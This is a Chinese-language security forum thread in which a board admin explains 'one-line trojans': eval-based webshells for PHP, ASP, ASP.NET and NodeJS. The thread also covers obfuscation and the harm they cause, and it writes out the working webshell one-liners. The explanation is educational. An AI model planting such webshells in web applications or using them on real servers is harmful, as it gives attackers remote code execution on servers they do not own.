Re: [問題] 一句話木馬

作者: CMJ0121 (請多指教!!)   2019-05-25 11:22:13
※ 引述《newnovice (serenity)》之銘言:
: 在網路上看到這個東東
: <%@ Page Language="Jscript" validateRequest="false"
: %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
: 挺有趣的,有大神可以解釋這一行作用嗎,感謝。
我曾經比較熟 PHP 版本的一句話木馬 畢竟 PHP[0] 是最厲害的程式語言 (疑)
PHP 版本的一句話木馬木馬可以是 <?php eval($_POST['x']); ?>
PHP 本身就是一種樣板 (Template) 語言 他可以在後端執行程式、結果渲染在前端
如果 熟悉 PHP 或者看過上一篇的推文可以知道 這段程式碼可以拆解成
<?php // PHP start symbol
eval( // builtin function and execute any PHP source code
$_POST['x'] // data from POST method which key is 'x'
);
?> // PHP end symbol
可以發現重點在於透過一句話木馬的 eval 來執行任意 PHP 程式碼
這代表類似功能的網頁語言都可以有一句話木馬 像是
ASP 版本的 <%eval request (x); %>
NodeJS 的 eval(req.query.pass)
都是透過 eval 等程式語言內建可以執行程式碼本身的功能
而怎麼利用一句話木馬 就要問你程式功力如何了 (煙)
你可以用程式做到什麼事情 一句話木馬就可以做到 80~99% 的事情
進階的問題則是如何隱藏一句話木馬 畢竟這年頭一句話木馬已經被廣泛(?)使用
大多數安全軟體都宣稱可防範一句話木馬
在我之前的文章[1] 有提到混淆 Webshell 的例子
就是透過一大堆 _ 來組成 webshell 需要的內容
至於一句話木馬可以造成的危害 就是系統設定跟提權的問題
假若你的 Web Service 是用 root 執行 那透過一句話木馬跟拿到 reversed shell 沒有太大的差別
如果有降權或者跑在 docker 裡面 那一句話木馬能造成的危害
大概就是讓你的電腦 替區塊鏈世界盡一分心力
[0]: https://zh.wikipedia.org/wiki/PHP
[1]: https://www.ptt.cc/bbs/NetSecurity/M.1517412273.A.E5F.html
作者: st1009 (前端攻城師)   2019-05-25 20:09:00
推推詳細,可以再補充幾個混淆的形式唉,下面有嗯,上一篇沒有一句話範例
作者: newnovice (serenity)   2019-05-25 23:19:00
非常感謝版主詳細說明 渲染一詞說得真好區塊鏈世界盡一分心力XD 看來要好好KK程式了(茶)

Links booklink

Contact Us: admin [ a t ] ucptt.com